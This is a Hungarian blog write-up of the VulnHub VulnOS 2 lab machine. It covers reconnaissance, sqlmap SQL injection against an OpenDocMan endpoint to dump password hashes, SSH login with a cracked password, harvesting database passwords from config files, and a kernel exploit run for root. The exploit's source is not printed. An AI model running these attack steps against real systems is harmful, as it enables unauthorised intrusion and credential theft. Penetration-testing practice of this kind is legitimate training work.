SYSOP_

VulnHub - VulnOS 2

Sat, 21 May 2016 17:37:07 +0200

Egy újabb feltörésre váró virtuális szerver jelent meg a napokban kedvenc oldalamon a VulnHub-on c4b3rw0lf jóvoltából. Mivel egyből nem tudtam neki kezdeni, így nagyon vártam a hétvégét és az új kihívást.

Információ gyűjtés

Sebezhetőség vizsgálatra Kali-t használok fixen beállított IP címmel, a cél gép pedig DHCP-ről kapja. A hálózati szegmens szeparált a lokális hálózattól. Virtualizáció tekintetében mindig KVM-et használok, így a letöltött vm-eket általában konvertálni kell, de ez nem okoz gondot.

Megkerestem a cél gépet.

# netdiscover -i eth0 -r 192.168.10.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                          
                                                                                        
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 126                        
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.10.1    fe:54:00:0e:a4:ce      1      42  Unknown vendor                       
 192.168.10.242  52:54:00:34:37:2d      1      42  Unknown vendor                       
 192.168.10.254  52:54:00:0e:a4:ce      1      42  Unknown vendor

Megnéztem a nyitott portokat.

# nmap -sS -sV -O 192.168.10.242 -p1-65535
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-17 19:25 CEST
Nmap scan report for 192.168.10.242 (192.168.10.242)
Host is up (0.00075s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open  irc     ngircd
MAC Address: 52:54:00:34:37:2D (QEMU virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.07 seconds

Ez ismét nem sok, van egy ssh a 22-es, egy Apache webszerver a 80-as és egy ngircd irc szerver a 6667-es porton.

Kíváncsi voltam mit mond a nikto.

# nikto -host http://192.168.10.242/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.10.242
+ Target Hostname:    192.168.10.242
+ Target Port:        80
+ Start Time:         2016-05-17 19:54:46 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x3c9 0x531f36393d540 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2016-05-17 19:54:56 (GMT2) (10 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Ezzel sem jutottam beljebb…

Jöhet a dirb, hátha talál valamit nekem.

# dirb http://192.168.10.242

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue May 17 19:56:53 2016
URL_BASE: http://192.168.10.242/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.10.242/ ----
+ http://192.168.10.242/index.html (CODE:200|SIZE:969)                                                                                                                
==> DIRECTORY: http://192.168.10.242/javascript/                                                                                                                      
+ http://192.168.10.242/server-status (CODE:403|SIZE:294)                                                                                                             
                                                                                                                                                                      
---- Entering directory: http://192.168.10.242/javascript/ ----
==> DIRECTORY: http://192.168.10.242/javascript/jquery/                                                                                                               
...                                                                                                                                                                      
---- Entering directory: http://192.168.10.242/javascript/jquery/ ----
+ http://192.168.10.242/javascript/jquery/jquery (CODE:200|SIZE:252879)                                                                                               
+ http://192.168.10.242/javascript/jquery/version (CODE:200|SIZE:5)                                                                                                   
                                                                                                                                                                      
-----------------
END_TIME: Tue May 17 19:57:01 2016
DOWNLOADED: 13836 - FOUND: 4

Akkor jöhet a böngésző.

Ellenőriztem a forrást, de a website linken kívül más nincs.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>VulnOSv2</title>
</head>

<body bgcolor="#000000" text="#FFFFFF" link="#FF0000">
<div align="center">
  <h3>##########<strong>############### Welcome to VulnOSv2 #########################
  </strong></h3>
  <h4>&nbsp;</h4>
  <h4>### VulnOS are a series of vulnerable operating systems packed as virtual images to enhance penetration testing skills ###</h4>
  <h4>This is a vulnerable server. DO NOT USE this VM in a production environment !</h4>
  <h4>&nbsp;</h4>
  <p>&nbsp;</p>
  <h3>&nbsp; </h3>
  <h3>&nbsp;</h3>
  <h4>### Pentest the company <a href="/jabc" title="JABC" target="new">website</a> on the server... Get root of the system and read the final flag ###</h4>
</div>
</body>
</html>

Erre az almappára is ráengedtem a dirb-t hátha mutat valamit.

# dirb http://192.168.10.242/jabc/
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat May 21 11:44:46 2016
URL_BASE: http://192.168.10.242/jabc/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.10.242/jabc/ ----
==> DIRECTORY: http://192.168.10.242/jabc/includes/                                                                                                    
+ http://192.168.10.242/jabc/index.php (CODE:200|SIZE:9525)                                                                                            
==> DIRECTORY: http://192.168.10.242/jabc/misc/                                                                                                        
==> DIRECTORY: http://192.168.10.242/jabc/modules/                                                                                                     
==> DIRECTORY: http://192.168.10.242/jabc/profiles/                                                                                                    
+ http://192.168.10.242/jabc/robots.txt (CODE:200|SIZE:1561)                                                                                           
==> DIRECTORY: http://192.168.10.242/jabc/scripts/                                                                                                     
==> DIRECTORY: http://192.168.10.242/jabc/sites/                                                                                                       
==> DIRECTORY: http://192.168.10.242/jabc/templates/                                                                                                   
==> DIRECTORY: http://192.168.10.242/jabc/themes/                                                                                                      
+ http://192.168.10.242/jabc/xmlrpc.php (CODE:200|SIZE:42)                                                                                             
...
...                                                                                                                                                       
-----------------
END_TIME: Sat May 21 11:44:49 2016
DOWNLOADED: 4612 - FOUND: 3

A robots.txt-be belenézve kiderült, hogy alaposan kigyomlált Drupal rendszerrel van dolgom.

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

Úgy gondoltam, hogy nem a Drupal felől lesz megközelíthető a rendszer.

Lássuk böngészőből.

Az oldalakat végig nézve, nem találtam érdekességet se a böngészőben, se a forrásban. Az url sávban láttam, hogy a http://192.168.10.242/jabc/?q=node/6 az utolsó oldal. Vagyis 1-töl 6-ig tart az oldalak száma. Át írtam az url-ben a 6-ost 7-re és kiderült, hogy van még egy oldal, amire nem mutat link a többiről.

Mivel túl üres volt az oldal, így sejthető volt, hogy itt ennél több információ is van. A teljes oldal kijelölése (CTRL+A) és a forrás átnézése után ki is derült, hogy van egy dokumentációs platform a /jabcd0cs mappában, amibe a guest/guest felhasználó és jelszó párossal be is juthatunk.

A guest felhasználóval belépve többféleképpen próbáltam valahogy egy php webshell-t szerezni, de nem sikerült. Az OpenDocMan verzió száma alapján (v1.2.7), viszont kiderült, hogy van SQLi (SQL befecskendezés) sebezhetősége, így hát neki eresztettem az sqlmap-ot.

# root@kali:~# sqlmap -u "http://192.168.10.242/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs
         _
 ___ ___| |_____ ___ ___  {1.0.5.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.okrg

---
available databases [6]:
[*] drupal7
[*] information_schema
[*] jabcd0cs
[*] mysql
[*] performance_schema
[*] phpmyadmin

Látszik a Drupal, az OpenDocMan és egy phpmyadmin adatbázis is. Bár a phpmyadmin mappáját a dirb nem találta meg, így lehet hogy az csak ott maradt és nincs használva.

# root@kali:~# sqlmap -u "http://192.168.10.242/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user
         _
 ___ ___| |_____ ___ ___  {1.0.5.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

---
[22:20:31] [INFO] fetching current user
current user:    'root@localhost'

Egy gyors ellenőrzés és kiderült hogy az adatbázis user maga a root.

root@kali:~# sqlmap -u "http://192.168.10.242/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --privileges
         _
 ___ ___| |_____ ___ ___  {1.0.5.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

---
database management system users privileges:
[*] 'debian-sys-maint'@'localhost' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'drupal7'@'localhost' [1]:
    privilege: USAGE
[*] 'phpmyadmin'@'localhost' [1]:
    privilege: USAGE
[*] 'root'@'127.0.0.1' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'::1' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'localhost' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'vulnosv2' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE

És az is kiderült, hogy bizony neki teljes jogosultsága van, vagyis mindenhez van joga.

Most próbáljuk megkeresni az adatbázisba regisztrált felhasználókat, keresve a user és password adatokat.

# root@pentestlab:~/Hack/Vulnhub_-_VulnOSv2# sqlmap -u "http://192.168.10.242/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables
         _
 ___ ___| |_____ ___ ___  {1.0.5.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

---
Database: jabcd0cs
[15 tables]
+-------------------+
| odm_access_log    |
| odm_admin         |
| odm_category      |
| odm_data          |
| odm_department    |
| odm_dept_perms    |
| odm_dept_reviewer |
| odm_filetypes     |
| odm_log           |
| odm_odmsys        |
| odm_rights        |
| odm_settings      |
| odm_udf           |
| odm_user          |
| odm_user_perms    |
+-------------------+

Itt az odm_user tábla lehet érdekes.

# root@pentestlab:~/Hack/Vulnhub_-_VulnOSv2# sqlmap -u "http://192.168.10.242/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --columns
         _
 ___ ___| |_____ ___ ___  {1.0.5.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

---
Database: jabcd0cs
Table: odm_user
[9 columns]
+---------------+------------------+
| Column        | Type             |
+---------------+------------------+
| department    | int(11) unsigned |
| Email         | varchar(50)      |
| first_name    | varchar(255)     |
| id            | int(11) unsigned |
| last_name     | varchar(255)     |
| password      | varchar(50)      |
| phone         | varchar(20)      |
| pw_reset_code | char(32)         |
| username      | varchar(25)      |
+---------------+------------------+

Ez lesz az, ki is dump-olom.

# root@pentestlab:~/Hack/Vulnhub_-_VulnOSv2# sqlmap -u "http://192.168.10.242/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump         _
 ___ ___| |_____ ___ ___  {1.0.5.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

---
[12:16:23] [INFO] postprocessing table dump                                                                                                            
Database: jabcd0cs
Table: odm_user
[3 entries]
+----+--------------+--------------------+----------+------------------------------------------+-----------+------------+------------+---------------+
| id | phone        | Email              | username | password                                 | last_name | first_name | department | pw_reset_code |
+----+--------------+--------------------+----------+------------------------------------------+-----------+------------+------------+---------------+
| 1  | 5555551212   | webmin@example.com | webmin   | b78aae356709f8c31118ea613980954b         | min       | web        | 2          | <blank>       |
| 2  | 555 5555555  | guest@example.com  | guest    | 084e0343a0486ff05530df6c705c8bb4 (guest) | guest     | guest      | 2          | NULL          |
| 3  | 999 99999999 | so@sh.com          | uname    | 0d9a9c25c0007ea340e22f08bb342961         | lname     | fname      | 1          | NULL          |
+----+--------------+--------------------+----------+------------------------------------------+-----------+------------+------------+---------------+

A dump felhasználót simán ki hash-elte az sqlmap, de a többihez segítség kell.

Meg is lett a webmin felhasználó jelszava: webmin1980. Mivel a OpenDocMan felületén a guest is admin jogosultságú, így itt nem reméltem a webmin felhasználótól több lehetőséget.

Viszont megpróbálva a webmin / webmin1980 felhasználó és jelszó párost az ssh-n keresztül sikerült kapnom egy shell-t.

# root@pentestlab:~/Hack/Vulnhub_-_VulnOSv2# ssh webmin@192.168.10.242
The authenticity of host '192.168.10.242 (192.168.10.242)' can't be established.
ECDSA key fingerprint is SHA256:nIyyJRPJMy1g6F5m8AIT7W//x6lj3ZqhUbYuvSafKeI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.10.242' (ECDSA) to the list of known hosts.
webmin@192.168.10.242's password: 
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat May 21 11:34:43 CEST 2016

  System load: 0.15              Memory usage: 2%   Processes:       63
  Usage of /:  5.8% of 29.91GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Wed May  4 10:41:07 2016

$ id && whoami
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)
webmin

Bent vagyok! :)

A burok (The shell)

Ha shell szintű hozzáférést sikerül szerezni egy rendszeren, akkor már majdnem biztos hogy az a rendszer elesett.

Megnézem mi van a saját mappánkban.

# ls -la
total 596
drwxr-x--- 3 webmin webmin   4096 May  3 19:26 .
drwxr-xr-x 4 root   root     4096 Apr 16 15:09 ..
-rw------- 1 webmin webmin     85 May  4 10:42 .bash_history
-rw-r--r-- 1 webmin webmin    220 Apr  9  2014 .bash_logout
-rw-r--r-- 1 webmin webmin   3637 Apr  9  2014 .bashrc
drwx------ 2 webmin webmin   4096 Apr 30 17:06 .cache
-rw-rw-r-- 1 webmin webmin 579442 Apr 30 15:25 post.tar.gz
-rw-r--r-- 1 webmin webmin    675 Apr  9  2014 .profile

Érdekes. Egy post.tar.gz csomag. Vajon mi lehet benne?

# tar tzfv post.tar.gz
-rw-r--r-- testosuser/testosuser 51806 2014-12-07 15:50 post/hydra-smb.c
-rw-r--r-- testosuser/testosuser  1120 2014-12-07 15:50 post/xhydra.1
-rw-r--r-- testosuser/testosuser 13423 2014-12-07 15:50 post/hydra-smtp.c
...
-rw-r--r-- testosuser/testosuser   8603 2014-12-07 15:50 post/hydra-sip.c
-rw-r--r-- testosuser/testosuser 191330 2014-12-07 15:50 post/hydra.c
-rw-r--r-- testosuser/testosuser    759 2014-12-07 15:50 post/INSTALL

# tar xzf post.tar.gz

# cat README

				  H Y D R A

                      (c) 2001-2014 by van Hauser / THC
                       <vh@thc.org> http://www.thc.org
       many modules were written by David (dot) Maciejak @ gmail (dot) com
                 BFG code by Jan Dlabal <dlabaljan@gmail.com>

  		    Licensed under AGPLv3 (see LICENSE file)

           Please do not use in military or secret service organizations,
                          or for illegal purposes.
...

Ez egy Hydra :) Lehet hogy majd szükség lesz rá? Egyenlőre kutatok tovább…

# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
...
vulnosadmin:x:1000:1000:vulnosadmin,,,:/home/vulnosadmin:/bin/bash
...
postgres:x:107:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

Ami érdekesnek tűnt, hogy az irc mellett van még egy vulnosadmin és egy postgres felhasználó is.

Szét nézek az etc mappában a futó szolgáltatások és a feltelepített alkalmazások konfigurációs fájljai után kutatva.

# cd /etc

# ls -la
total 876
drwxr-xr-x 102 root root    4096 May 21 11:34 .
drwxr-xr-x  21 root root    4096 Apr  3 18:06 ..
drwxr-xr-x   3 root root    4096 Apr  3 18:12 acpi
-rw-r--r--   1 root root    2981 Apr 16  2014 adduser.conf
-rw-r--r--   1 root root      51 Apr 16 15:10 aliases
...
drwxr-xr-x   3 root root    4096 Apr 16 15:10 drupal
...
drwxr-xr-x   4 root root    4096 Apr  3 18:05 X11
drwxr-xr-x   2 root root    4096 Apr  3 18:12 xml
-rw-r--r--   1 root root     349 Jun 26  2012 zsh_command_not_found

Meg is van a Drupal mappája. Szétnézek benne.

# cd drupal

# ls -la
total 12
drwxr-xr-x   3 root root 4096 Apr 16 15:10 .
drwxr-xr-x 102 root root 4096 May 21 11:34 ..
drwxr-xr-x   3 root root 4096 Apr 16 15:10 7

# cd 7

# ls -la
total 24
drwxr-xr-x 3 root root 4096 Apr 16 15:10 .
drwxr-xr-x 3 root root 4096 Apr 16 15:10 ..
-rw-r--r-- 1 root root  158 Jan 15  2014 apache2.conf
-rw-r--r-- 1 root root 5767 Oct 16  2014 htaccess
drwxrwxrwx 4 root root 4096 Apr 16 15:22 sites

# cd sites

# ls -la
total 16
drwxrwxrwx 4 root     root     4096 Apr 16 15:22 .
drwxr-xr-x 3 root     root     4096 Apr 16 15:10 ..
dr-xr-xr-x 4 www-data www-data 4096 Apr 16 15:23 all
dr-xr-xr-x 2 www-data root     4096 Apr 16 15:11 default

# cd default

# ls -la
total 32
dr-xr-xr-x 2 www-data root      4096 Apr 16 15:11 .
drwxrwxrwx 4 root     root      4096 Apr 16 15:22 ..
-rwxrwxrwx 1 root     www-data   576 Apr 16 15:11 dbconfig.php
lrwxrwxrwx 1 root     root        22 Oct 16  2014 files -> /var/lib/drupal7/files
-rwxrwxrwx 1 root     root     18599 Jan 15  2014 settings.php

… a konfigurációs fájlok olvashatóak!

# cat dbconfig.php
<?php
#
# database access settings in php format
# automatically generated from /etc/dbconfig-common/drupal7.conf
# by /usr/sbin/dbconfig-generate-include
#
# by default this file is managed via ucf, so you shouldn't have to
# worry about manual changes being silently discarded.  *however*,
# you'll probably also want to edit the configuration file mentioned
# above too.

$databases['default']['default'] = array(
	'driver' => 'mysql',
	'database' => 'drupal7',
	'username' => 'drupal7',
	'password' => 'toor',
	'host' => 'localhost',
	'port' => '',
	'prefix' => ''
);

?>

Itt is van a Drupal mysql adatbázis neve (drupal7), felhasználója (drupal7) és mysql jelszava (toor). Persze azért le is ellenőrzöm.

# mysql -u drupal7 -p drupal7
Enter password:  toor
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1082
Server version: 5.5.47-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> quit;
Bye

Szép! :)

De ne feledkezzek meg magáról a rendszerről sem.

# cat /etc/issue
### Welcome to VulnOSv2 ###

# cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.4 LTS"

# uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux

Vajon van a 3.13.0-24-es kernelhez exploit, ami közelebb vinne a root jogosultsághoz?

Találtam is a kernel-exploits oldalán exploit-ot hozzá.

A forrását be is másoltam egy nano-val nyitott fájlba, lefordítottam és lefuttatva már meg is van a root jogosultság! :)

# nano exploit.c 

webmin@VulnOSv2:~$ gcc exploit.c -o exploit

# ./exploit 
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library

# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)

És mi van a root home mappájában… ?

# cd /root

# ls -la
total 36
drwx------  3 root root 4096 May  4 19:37 .
drwxr-xr-x 21 root root 4096 Apr  3 18:06 ..
-rw-------  1 root root   52 May 21 14:05 .bash_history
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
drwx------  2 root root 4096 May  2 18:55 .cache
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-------  1 root root    3 May  2 19:01 .psql_history
-rw-------  1 root root  735 May  4 19:06 .viminfo
-rw-r--r--  1 root root  165 May  4 19:06 flag.txt

Itt a hőn vágyott flag.txt. A tartalma pedig… :)

# cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

Tulajdonképpen ennyi volt. A zászló meg van, miénk a vár! De azért engem még érdekelne az a bizonyos vulnosadmin felhasználó :)

Ugyan mit rejtegethet a mappája…

# cd /home/vulnosadmin

# ls -la
total 476
drwxr-x--- 3 vulnosadmin vulnosadmin   4096 May  4 19:35 .
drwxr-xr-x 4 root        root          4096 Apr 16 15:09 ..
-rw------- 1 vulnosadmin vulnosadmin   4817 May  4 19:36 .bash_history
-rw-r--r-- 1 vulnosadmin vulnosadmin    220 Apr  3 18:14 .bash_logout
-rw-r--r-- 1 vulnosadmin vulnosadmin   3637 Apr  3 18:14 .bashrc
drwx------ 2 vulnosadmin vulnosadmin   4096 Apr  3 18:17 .cache
-rw-r--r-- 1 vulnosadmin vulnosadmin    675 Apr  3 18:14 .profile
-rw------- 1 root        root          1504 May  2 18:51 .viminfo
-rw-rw-r-- 1 vulnosadmin vulnosadmin 449100 May  4 18:41 r00t.blend

Van itt egy szép kövér .bash_history, amiben végig nézhetem a készítés menetét… vagy legalábbis egy részét, a shell parancsokat :)

# less .bash_history
WARNING: terminal is not fully functional
sudo apt-get updatess RETURN)
sudo apt-get upgrade
sudo reboot
...

És van itt még egy r00t.blend bináris, amit nem próbálok ki, mert bizalmatlan vagyok :)

# file r00t.blend
r00t.blend: Blender3D, saved as 32-bits little endian with version 2.77

És vajon miért van a rendszeren postgres felhasználó?

# su postgres

# psql 
psql (9.3.11)
Type "help" for help.

postgres=# \du
                             List of roles
 Role name |                   Attributes                   | Member of 
-----------+------------------------------------------------+-----------
 postgres  | Superuser, Create role, Create DB, Replication | {}

postgres=# \l
                                  List of databases
   Name    |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges   
-----------+----------+----------+-------------+-------------+-----------------------
 postgres  | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | 
 system    | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =CTc/postgres        +
           |          |          |             |             | postgres=CTc/postgres
 template0 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
           |          |          |             |             | postgres=CTc/postgres
 template1 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
           |          |          |             |             | postgres=CTc/postgres
(4 rows)

Végig nyálaztam mindent, de végül nem találtam ki, hogy mi a szerepe :)

Egy utolsó pillantás a phpmyqdmin konfigurációs fájljára…

# cat /etc/dbconfig-common/phpmyadmin.conf | egrep -v ^# | egrep -v ^$
dbc_install='true'
dbc_upgrade='true'
dbc_remove=''
dbc_dbtype='mysql'
dbc_dbuser='phpmyadmin'
dbc_dbpass='toor'
dbc_dbserver=''
dbc_dbport=''
dbc_dbname='phpmyadmin'
dbc_dbadmin='root'
dbc_basepath=''
dbc_ssl=''
dbc_authmethod_admin=''
dbc_authmethod_user=''

A phpmyadmin mysql felhaszálója phpmyadmin és a jelszava neki is toor. Mivel gyanús az egyezés a Drupal mysql felhasználó jelszavával, így megpróbálom hogy hátha ugyanaz a mysql root jelszava is.

# mysql -u root -p
Enter password:  toor
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1085
Server version: 5.5.47-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupal7            |
| jabcd0cs           |
| mysql              |
| performance_schema |
| phpmyadmin         |
+--------------------+
6 rows in set (0.03 sec)

mysql> exit
Bye

És ugyanaz! :)

